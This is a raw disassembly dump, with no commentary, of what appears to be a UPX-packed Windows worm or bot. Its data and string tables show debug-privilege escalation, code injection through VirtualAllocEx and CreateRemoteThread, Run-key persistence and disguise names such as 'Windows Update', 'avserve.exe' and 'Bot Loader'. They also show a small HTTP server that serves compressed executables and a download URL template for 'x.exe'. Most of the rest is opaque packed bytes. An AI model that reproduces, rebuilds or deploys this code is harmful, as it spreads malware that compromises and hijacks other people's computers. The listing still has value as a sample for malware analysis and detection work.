; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 70h ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h
dd 40D859h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h
dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh
dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh
dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh
dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h
dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h
dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h
dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h
dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h
dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h
dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h
dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h
dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h
dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h
dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h
dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h
dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h
dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h
dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h
dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh
dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah
dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h
dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h
dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h
dd 21DE53C3h, 948E694Eh
dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch
dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h
dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh
dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h
dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h
dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h
dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh
dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh
dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h
dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h
dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h
dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h
dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h
dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh
dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h
dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah
dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h
dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh
dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh
dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh
dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h
dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
